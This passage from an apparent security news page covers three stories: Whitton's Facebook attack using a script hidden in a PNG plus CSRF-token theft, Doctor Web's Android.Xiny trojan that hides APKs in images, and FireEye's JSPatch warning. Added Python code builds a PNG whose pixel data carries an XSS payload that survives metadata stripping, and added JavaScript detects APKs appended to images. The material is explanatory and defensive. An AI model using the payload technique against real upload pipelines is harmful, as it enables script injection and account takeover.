However, uploaded files are stored on Facebook's content delivery network (CDN), which is sandboxed on a separate origin: because of the same-origin policy, script running from the image cannot read web data such as session cookies from facebook.com.
Whitton found a way to upload a hidden script to the CDN and then retrieve it via a specially crafted URL on a facebook.com domain that looks harmless and that a user could be tricked into clicking.
To make requests to facebook.com directly, Whitton found several Facebook plugins designed to be embedded in an iframe; loading one of them reveals the user's CSRF token, which allows an attacker to act on the user's behalf simply by getting the victim to click a link.
“What we now need to do is load the plugin inside an iframe, wait for the onload event to fire, and extract the token from the content,” Whitton explained in a blog post. “We now have access to the user’s CSRF token, which means we can make arbitrary requests on their behalf (such as posting a status, etc).”
If the victim was logged in, the malicious script could impersonate them and access their data.
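To make the IDAT step concrete, here is an added Python example (not Whitton's code) that builds a valid PNG whose pixel bytes are the payload, runs it through a model of a metadata-stripping sanitiser like the one described above, and shows the payload still sitting verbatim inside the file. The technique used here is to compress the scanline with zlib level 0, which emits stored (uncompressed) deflate blocks; the article does not say how Whitton kept his payload intact through compression, so this choice is the example's, not necessarily his, and it only holds as long as the server re-emits the original bytes rather than re-encoding the image. The .html extension and the CDN-origin details of the real attack are outside this snippet. The tEXt chunk, payload string and chunk list are constructed for the example.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Chunk types a typical "strip metadata" pass removes; IDAT (pixel data) is
# not among them, which is exactly what the bug relied on.
METADATA_CHUNKS = {b"tEXt", b"zTXt", b"iTXt", b"eXIf"}


def _chunk(ctype, data):
    """Serialise one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png_with_payload(payload, comment=b"Comment\x00constructed sample"):
    """8-bit greyscale PNG, one row high, whose pixel bytes are exactly `payload`.

    zlib level 0 emits a stored (uncompressed) deflate block, so the payload
    appears verbatim inside the IDAT chunk instead of being transformed by
    compression.  A tEXt chunk is included to model the metadata a sanitiser strips.
    """
    if not 0 < len(payload) < 65000:          # must fit one stored block
        raise ValueError("payload length out of range")
    # width, height, bit depth, colour type 0 (grey), compression, filter, interlace
    ihdr = struct.pack(">IIBBBBB", len(payload), 1, 8, 0, 0, 0, 0)
    scanline = b"\x00" + payload              # filter type 0 (None), then the pixels
    idat = zlib.compress(scanline, 0)
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", comment)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


def iter_chunks(png):
    """Yield (type, data) for each chunk, verifying the signature and every CRC."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if crc != zlib.crc32(ctype + data) & 0xFFFFFFFF:
            raise ValueError("bad CRC in chunk %r" % ctype)
        yield ctype, data
        pos += 12 + length


def strip_metadata(png):
    """Model of a sanitiser that drops text/Exif chunks but re-emits IDAT untouched."""
    return PNG_SIGNATURE + b"".join(_chunk(t, d) for t, d in iter_chunks(png)
                                    if t not in METADATA_CHUNKS)


def decode_pixels(png):
    """Validate the image and inflate IDAT; returns (width, height, pixel bytes)."""
    chunks = list(iter_chunks(png))
    ihdr = next(d for t, d in chunks if t == b"IHDR")
    width, height, depth, colour = struct.unpack(">IIBB", ihdr[:10])
    if (depth, colour) != (8, 0):
        raise ValueError("only 8-bit greyscale handled here")
    raw = zlib.decompress(b"".join(d for t, d in chunks if t == b"IDAT"))
    stride, rows = width + 1, []          # one filter byte plus one byte per pixel
    for y in range(height):
        row = raw[y * stride:(y + 1) * stride]
        if row[0] != 0:
            raise ValueError("only filter type 0 handled here")
        rows.append(row[1:])
    return width, height, b"".join(rows)


if __name__ == "__main__":
    payload = b"<script>alert(document.domain)</script>"
    png = build_png_with_payload(payload)
    cleaned = strip_metadata(png)
    print("payload survives sanitiser:", payload in cleaned)
    print("still a valid PNG:", decode_pixels(cleaned)[2] == payload)
```

The defensive lesson is the mirror image of the build step: a sanitiser that only removes metadata chunks does nothing about pixel data, so an upload pipeline that lets the file be served under an attacker-chosen extension or content type has to re-encode the image (or serve it from an origin nothing trusts) rather than rely on chunk filtering.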
Dozens of games infected with Xiny available on the Google Play
1.2.2016
Experts at Dr Web discovered dozens of Android game apps in the Google Play Store have been infected with the Android.Xiny Trojan.
Bad news for Android users: according to security firm Doctor Web, dozens of game apps in the Google Play Store have been infected with the Android.Xiny.19.origin Trojan. The malware lets attackers control the victim's mobile device by installing and running arbitrary software (apk files), and it also displays annoying advertisements.
“However, the main threat of Android.Xiny.19.origin lies in its capability to download and dynamically run arbitrary apk files upon cybercriminals’ command. However, the way it is carried out is rather unique.” states a blog post published by Doctor Web.
The malware collects information from the infected device and sends it back to the command and control server: the IMEI, the MAC address, the version and language of the operating system and the mobile network operator's name.
Experts at Doctor Web found more than 60 games infected with Android.Xiny distributed through the official Google Play Store. The malicious apps were apparently published by more than 30 different developer accounts under names including Conexagon Studio, Fun Color Games and BILLAPPS.
“At first glance, these affected games look similar to numerous such-like applications; and they are games indeed, with just one difference—while a user is playing a game, the Trojan is performing its malicious activity.” states Doctor Web.
Another interesting feature of Android.Xiny is that it uses steganography to hide malicious programs inside specially crafted images: the Trojan receives such images from the server and then extracts the apk they contain.
Android.Xiny can perform many other malicious operations without the user’s consent. The researchers noticed that although it is not yet able to gain root privileges on its own, it can download the appropriate exploit in order to obtain root access to the device.
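The page does not say how Xiny encodes the apk inside the image, so the following added example (not Doctor Web’s code and not a Xiny sample) checks only the simplest and most common form of this trick, an archive appended after the PNG IEND chunk; that choice is an assumption. It walks the chunk list rather than searching the whole file, because a ZIP signature inside legitimate IDAT data would be a false positive, while anything after IEND is by definition not part of the image.

```javascript
// Added example, not Doctor Web's code. Assumption: the payload is appended
// after the PNG IEND chunk; APK files are ZIP archives, so look for "PK\x03\x04".
const PNG_SIG = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);
const ZIP_SIG = Buffer.from('PK\x03\x04', 'latin1');

// Standard CRC-32 as used by PNG chunks (needed only to build a valid sample).
function crc32(buf) {
  let crc = 0xffffffff;
  for (let i = 0; i < buf.length; i++) {
    let c = (crc ^ buf[i]) & 0xff;
    for (let k = 0; k < 8; k++) c = c & 1 ? 0xedb88320 ^ (c >>> 1) : c >>> 1;
    crc = (crc >>> 8) ^ c;
  }
  return (crc ^ 0xffffffff) >>> 0;
}

// Walk the chunk list and return whatever follows IEND (empty for a clean file).
function pngTrailer(png) {
  if (png.length < 8 || !png.subarray(0, 8).equals(PNG_SIG)) throw new Error('not a PNG');
  let off = 8;
  while (off + 12 <= png.length) {
    const len = png.readUInt32BE(off);
    const type = png.toString('latin1', off + 4, off + 8);
    const next = off + 12 + len; // length + type + data + crc
    if (next > png.length) throw new Error('truncated chunk ' + type);
    if (type === 'IEND') return png.subarray(next);
    off = next;
  }
  throw new Error('no IEND chunk');
}

// Return the embedded archive bytes, or null when the trailer holds no ZIP header.
function extractHiddenApk(png) {
  const trailer = pngTrailer(png);
  const at = trailer.indexOf(ZIP_SIG);
  return at === -1 ? null : trailer.subarray(at);
}

// Build a chunk with a correct CRC so the constructed sample is structurally valid.
function pngChunk(type, data) {
  const body = Buffer.concat([Buffer.from(type, 'latin1'), data]);
  const len = Buffer.alloc(4); len.writeUInt32BE(data.length, 0);
  const crc = Buffer.alloc(4); crc.writeUInt32BE(crc32(body), 0);
  return Buffer.concat([len, body, crc]);
}

// Constructed samples: a 1x1 RGB PNG shell (IDAT bytes are a placeholder, the
// scanner never decodes them), once clean and once with a fake APK appended.
const IHDR = Buffer.from([0, 0, 0, 1, 0, 0, 0, 1, 8, 2, 0, 0, 0]);
const CLEAN_PNG = Buffer.concat([
  PNG_SIG,
  pngChunk('IHDR', IHDR),
  pngChunk('IDAT', Buffer.from('placeholder', 'latin1')),
  pngChunk('IEND', Buffer.alloc(0)),
]);
const FAKE_APK = Buffer.concat([ZIP_SIG, Buffer.from('APKPAYLOAD', 'latin1')]);
const STEGO_PNG = Buffer.concat([CLEAN_PNG, FAKE_APK]);
```

Run it against a real file with `extractHiddenApk(require('fs').readFileSync(path))`; a non-null result is worth pulling apart with a ZIP tool. Payloads hidden in pixel data (true LSB steganography) will not be caught by this check, which is why the text’s point about the Trojan receiving images from its server matters for detection: the download itself is the observable event.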
“Android.Xiny.19.origin can perform other malicious functions, such as to download and prompt a user to install different software, or to install and delete applications without the user’s knowledge if root access is available on the device.” continues the post.
“it can download a set of exploits from the server in order to gain root access to the device for covert installation or deletion of applications.”
Doctor Web has already reported the discovery to Google.
Unfortunately, using Google Play to distribute malware is nothing new: in January Lookout discovered 13 Android apps infected with the Brain Test malware available for download from the official store.
JSPatch hot patching technique puts iOS users at risk
1.2.2016
Security experts at FireEye are warning attackers can exploit the JSPatch hot patching technique to serve malicious code and put iOS users at risk
Releasing hot patches for apps already published in the official App Store is a time-consuming procedure that frustrates developers.
Apple’s own rules leave room for a shortcut: an app may download and run code interpreted by the built-in JavaScriptCore engine, and frameworks have been built on that mechanism so that iOS developers can ship a hotfix without passing through the strict controls of Apple’s review process.
Unfortunately, this ‘alternative’ process exposes Apple users to the risk of cyber attacks.
The technology under scrutiny is JSPatch; experts at FireEye warn about possible abuse that could allow attackers to push malicious updates to apps already in the official store.
According to the experts at FireEye, attackers could exploit the JSPatch technology to serve malicious updates that could allow the apps to carry out a number of malicious activities.
“The JSPatch technology potentially allows an individual to effectively circumvent the protection imposed by the App Store review process and perform arbitrary and powerful actions on the device without consent from the users. The dynamic nature of the code makes it extremely difficult to catch a malicious actor in action.” states a blog post published by FireEye.
In one proof of concept presented by the experts, the attackers use the iOS Pasteboard, which is commonly used to copy and paste content between different apps, to exfiltrate personal data from the victim’s mobile device.
There are two possible attack scenarios involving the JSPatch framework. In the first, malicious developers initially publish a harmless app on the store and later update it with malicious code through JSPatch; in the second, attackers run a man-in-the-middle attack against an app that loads its JSPatch code over an unencrypted channel and substitute their own script.
For further details on the JSPatch framework and the possible attack methods, take a look at the post published by FireEye.